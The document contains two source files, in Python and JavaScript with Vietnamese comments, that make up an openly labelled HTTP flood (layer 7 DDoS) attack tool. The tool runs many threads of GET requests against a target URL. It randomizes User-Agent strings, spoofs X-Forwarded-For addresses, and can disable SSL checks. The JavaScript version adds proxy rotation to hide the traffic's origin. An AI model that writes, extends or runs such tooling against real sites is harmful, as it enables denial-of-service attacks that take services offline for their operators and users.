File: python-ddos/ddos_layer7.py
#!/usr/bin/env python3
import socket
import threading
import random
import time
import argparse
import logging
import os
import psutil
from concurrent.futures import ThreadPoolExecutor
from fake_useragent import UserAgent
import requests
from urllib3.exceptions import InsecureRequestWarning
from datetime import datetime

# Cấu hình logging
logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s - %(levelname)s - %(message)s',
    handlers=[
        logging.FileHandler(f'ddos_attack_{datetime.now().strftime("%Y%m%d_%H%M%S")}.log'),
        logging.StreamHandler()
    ]
)

# Tắt cảnh báo SSL
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

class DDoSLayer7:
    def __init__(self, target_url, num_threads=100, duration=60, rate_limit=10, verify_ssl=True):
        self.target_url = target_url
        self.num_threads = num_threads
        self.duration = duration
        self.rate_limit = rate_limit
        self.verify_ssl = verify_ssl
        self.ua = UserAgent()
        self.successful_requests = 0
        self.failed_requests = 0
        self.start_time = None
        self.stop_flag = False
        self.last_request_time = time.time()
        self.lock = threading.Lock()

    def generate_headers(self):
        return {
            'User-Agent': self.ua.random,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Connection': 'keep-alive',
            'Upgrade-Insecure-Requests': '1',
            'Cache-Control': 'max-age=0',
            'X-Forwarded-For': f"{random.randint(1, 255)}.{random.randint(1, 255)}.{random.randint(1, 255)}.{random.randint(1, 255)}"
        }

    def rate_limit_delay(self):
        now = time.time()
        time_since_last_request = now - self.last_request_time
        min_delay = 1.0 / self.rate_limit
        
        if time_since_last_request < min_delay:
            time.sleep(min_delay - time_since_last_request)
        
        self.last_request_time = time.time()

    def check_memory_usage(self):
        process = psutil.Process(os.getpid())
        memory_info = process.memory_info()
        return {
            'rss': f"{memory_info.rss / 1024 / 1024:.1f}MB",
            'vms': f"{memory_info.vms / 1024 / 1024:.1f}MB"
        }

    def attack(self):
        while not self.stop_flag:
            try:
                self.rate_limit_delay()
                
                response = requests.get(
                    self.target_url,
                    headers=self.generate_headers(),
                    verify=self.verify_ssl,
                    timeout=5
                )
                
                with self.lock:
                    if response.status_code == 200:
                        self.successful_requests += 1
                    else:
                        self.failed_requests += 1
                        logging.warning(f"Request failed with status code: {response.status_code}")
                
            except requests.exceptions.RequestException as e:
                with self.lock:
                    self.failed_requests += 1
                logging.error(f"Request error: {str(e)}")
                time.sleep(1)  # Delay on connection errors
            except Exception as e:
                with self.lock:
                    self.failed_requests += 1
                logging.error(f"Unexpected error: {str(e)}")

    def start(self):
        logging.info(f"Starting DDoS Layer 7 attack on {self.target_url}")
        logging.info(f"Number of threads: {self.num_threads}")
        logging.info(f"Duration: {self.duration} seconds")
        logging.info(f"Rate limit: {self.rate_limit} requests/second/thread")
        logging.info(f"CPU Cores: {os.cpu_count()}")
        
        self.start_time = time.time()
        self.stop_flag = False

        with ThreadPoolExecutor(max_workers=self.num_threads) as executor:
            futures = [executor.submit(self.attack) for _ in range(self.num_threads)]
            
            try:
                while time.time() - self.start_time < self.duration:
                    time.sleep(1)
                    elapsed = time.time() - self.start_time
                    total_requests = self.successful_requests + self.failed_requests
                    rps = total_requests / elapsed if elapsed > 0 else 0
                    
                    memory_usage = self.check_memory_usage()
                    logging.info(
                        f"Progress: {elapsed:.1f}s | "
                        f"Successful: {self.successful_requests} | "
                        f"Failed: {self.failed_requests} | "
                        f"RPS: {rps:.1f} | "
                        f"Memory: {memory_usage['rss']}"
                    )
            except KeyboardInterrupt:
                logging.warning("Attack stopped by user")
            finally:
                self.stop_flag = True
                for future in futures:
                    future.cancel()

        self.print_stats()

    def stop(self):
        self.stop_flag = True

    def print_stats(self):
        total_time = time.time() - self.start_time
        total_requests = self.successful_requests + self.failed_requests
        rps = total_requests / total_time if total_time > 0 else 0
        memory_usage = self.check_memory_usage()

        logging.info("Attack completed")
        logging.info(f"Total time: {total_time:.1f} seconds")
        logging.info(f"Total successful requests: {self.successful_requests}")
        logging.info(f"Total failed requests: {self.failed_requests}")
        logging.info(f"Total requests: {total_requests}")
        logging.info(f"Average RPS: {rps:.1f}")
        logging.info(f"Final memory usage: {memory_usage['rss']}")

def main():
    parser = argparse.ArgumentParser(description='DDoS Layer 7 Attack Tool')
    parser.add_argument('target', help='Target URL (e.g., http://example.com)')
    parser.add_argument('-t', '--threads', type=int, default=100, help='Number of threads (default: 100)')
    parser.add_argument('-d', '--duration', type=int, default=60, help='Attack duration in seconds (default: 60)')
    parser.add_argument('-r', '--rate', type=int, default=10, help='Requests per second per thread (default: 10)')
    parser.add_argument('--no-ssl-verify', action='store_true', help='Disable SSL verification')
    
    args = parser.parse_args()
    
    if not args.target.startswith(('http://', 'https://')):
        logging.error("Target URL must start with http:// or https://")
        return

    ddos = DDoSLayer7(
        args.target,
        args.threads,
        args.duration,
        args.rate,
        not args.no_ssl_verify
    )
    ddos.start()

if __name__ == "__main__":
    main() 

File: js-ddos/ddos_layer7.js
#!/usr/bin/env node

const axios = require('axios');
const { program } = require('commander');
const { Worker, isMainThread, parentPort, workerData } = require('worker_threads');
const userAgents = require('user-agents');
const ProxyManager = require('./proxy-manager');
const os = require('os');

// Cấu hình chương trình
program
    .name('ddos-layer7')
    .description('DDoS Layer 7 Attack Tool (JavaScript Version)')
    .argument('<url>', 'Target URL (e.g., http://example.com)')
    .option('-t, --threads <number>', 'Number of threads', '100')
    .option('-d, --duration <number>', 'Attack duration in seconds', '60')
    .option('-p, --proxy <url>', 'Proxy URL (optional)')
    .option('-u, --update-proxies', 'Update proxy list before attack')
    .option('-r, --rate <number>', 'Requests per second per thread', '10')
    .option('--no-ssl-verify', 'Disable SSL verification')
    .parse(process.argv);

const options = program.opts();
const targetUrl = program.args[0];

// Kiểm tra URL hợp lệ
if (!targetUrl.startsWith('http://') && !targetUrl.startsWith('https://')) {
    console.error('[!] Error: Target URL must start with http:// or https://');
    process.exit(1);
}

// Kiểm tra memory usage
const checkMemoryUsage = () => {
    const used = process.memoryUsage();
    const memoryUsage = {
        rss: `${Math.round(used.rss / 1024 / 1024)}MB`,
        heapTotal: `${Math.round(used.heapTotal / 1024 / 1024)}MB`,
        heapUsed: `${Math.round(used.heapUsed / 1024 / 1024)}MB`
    };
    console.log('\n[*] Memory Usage:', memoryUsage);
};

// Class chính cho tấn công
class DDoSLayer7 {
    constructor(targetUrl, numThreads, duration, proxyManager = null) {
        this.targetUrl = targetUrl;
        this.numThreads = parseInt(numThreads);
        this.duration = parseInt(duration);
        this.proxyManager = proxyManager;
        this.successfulRequests = 0;
        this.failedRequests = 0;
        this.startTime = null;
        this.stopFlag = false;
        this.rateLimit = parseInt(options.rate) || 10;
        this.lastRequestTime = Date.now();
    }

    // Tạo headers ngẫu nhiên
    generateHeaders() {
        const userAgent = new userAgents();
        return {
            'User-Agent': userAgent.toString(),
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Connection': 'keep-alive',
            'Upgrade-Insecure-Requests': '1',
            'Cache-Control': 'max-age=0',
            'X-Forwarded-For': `${Math.floor(Math.random() * 255)}.${Math.floor(Math.random() * 255)}.${Math.floor(Math.random() * 255)}.${Math.floor(Math.random() * 255)}`
        };
    }

    // Rate limiting
    async rateLimitDelay() {
        const now = Date.now();
        const timeSinceLastRequest = now - this.lastRequestTime;
        const minDelay = 1000 / this.rateLimit;
        
        if (timeSinceLastRequest < minDelay) {
            await new Promise(resolve => setTimeout(resolve, minDelay - timeSinceLastRequest));
        }
        this.lastRequestTime = Date.now();
    }

    // Thực hiện tấn công
    async attack() {
        while (!this.stopFlag) {
            try {
                await this.rateLimitDelay();

                const config = {
                    headers: this.generateHeaders(),
                    timeout: 5000,
                    validateStatus: false,
                    httpsAgent: options.sslVerify ? undefined : new (require('https').Agent)({ rejectUnauthorized: false })
                };

                // Sử dụng proxy ngẫu nhiên nếu có
                if (this.proxyManager) {
                    const proxy = this.proxyManager.getRandomProxy();
                    if (proxy) {
                        const [host, port] = proxy.split(':');
                        config.proxy = {
                            host,
                            port,
                            protocol: 'http'
                        };
                    }
                }

                const response = await axios.get(this.targetUrl, config);
                if (response.status === 200) {
                    this.successfulRequests++;
                } else {
                    this.failedRequests++;
                }
            } catch (error) {
                this.failedRequests++;
                if (error.code === 'ECONNREFUSED' || error.code === 'ETIMEDOUT') {
                    await new Promise(resolve => setTimeout(resolve, 1000)); // Delay on connection errors
                }
            }
        }
    }

    // Khởi động tấn công
    async start() {
        console.log(`[*] Starting DDoS Layer 7 attack on ${this.targetUrl}`);
        console.log(`[*] Number of threads: ${this.numThreads}`);
        console.log(`[*] Duration: ${this.duration} seconds`);
        console.log(`[*] Rate limit: ${this.rateLimit} requests/second/thread`);
        console.log(`[*] CPU Cores: ${os.cpus().length}`);
        if (this.proxyManager) {
            console.log(`[*] Using proxy rotation`);
        }

        this.startTime = Date.now();
        this.stopFlag = false;

        // Tạo workers
        const workers = [];
        for (let i = 0; i < this.numThreads; i++) {
            const worker = new Worker(__filename, {
                workerData: {
                    targetUrl: this.targetUrl,
                    proxyManager: this.proxyManager ? true : false,
                    rateLimit: this.rateLimit
                }
            });
            workers.push(worker);
        }

        // Hiển thị thống kê
        const statsInterval = setInterval(() => {
            const elapsed = (Date.now() - this.startTime) / 1000;
            const requestsPerSecond = (this.successfulRequests + this.failedRequests) / elapsed;
            process.stdout.write(`\r[*] Attack in progress... Time elapsed: ${elapsed.toFixed(1)}s | ` +
                `Successful: ${this.successfulRequests} | ` +
                `Failed: ${this.failedRequests} | ` +
                `RPS: ${requestsPerSecond.toFixed(1)}`);
        }, 1000);

        // Kiểm tra memory mỗi 30 giây
        const memoryInterval = setInterval(checkMemoryUsage, 30000);

        // Xử lý dừng tấn công
        process.on('SIGINT', () => {
            console.log('\n[!] Attack stopped by user');
            this.stop();
        });

        // Tự động dừng sau khoảng thời gian
        setTimeout(() => {
            this.stop();
        }, this.duration * 1000);

        // Đợi tất cả workers hoàn thành
        await Promise.all(workers.map(worker => new Promise(resolve => {
            worker.on('exit', resolve);
        })));

        clearInterval(statsInterval);
        clearInterval(memoryInterval);
        this.printStats();
    }

    // Dừng tấn công
    stop() {
        this.stopFlag = true;
    }

    // In thống kê
    printStats() {
        const totalTime = (Date.now() - this.startTime) / 1000;
        const totalRequests = this.successfulRequests + this.failedRequests;
        const requestsPerSecond = totalRequests / totalTime;

        console.log('\n[*] Attack completed');
        console.log(`[*] Total time: ${totalTime.toFixed(1)} seconds`);
        console.log(`[*] Total successful requests: ${this.successfulRequests}`);
        console.log(`[*] Total failed requests: ${this.failedRequests}`);
        console.log(`[*] Total requests: ${totalRequests}`);
        console.log(`[*] Average RPS: ${requestsPerSecond.toFixed(1)}`);
        checkMemoryUsage();
    }
}

// Worker thread
if (!isMainThread) {
    const { targetUrl, proxyManager, rateLimit } = workerData;
    const attacker = new DDoSLayer7(
        targetUrl,
        1,
        Infinity,
        proxyManager ? new ProxyManager() : null
    );
    attacker.rateLimit = rateLimit;
    attacker.attack();
}

// Main thread
if (isMainThread) {
    async function main() {
        let proxyManager = null;

        // Cập nhật danh sách proxy nếu được yêu cầu
        if (options.updateProxies) {
            console.log('[*] Updating proxy list...');
            proxyManager = new ProxyManager();
            await proxyManager.updateProxies();
        } else {
            // Hoặc sử dụng danh sách proxy hiện có
            proxyManager = new ProxyManager();
            proxyManager.loadProxies();
        }

        const attacker = new DDoSLayer7(
            targetUrl,
            options.threads,
            options.duration,
            proxyManager
        );
        await attacker.start();
    }

    main().catch(console.error);
}
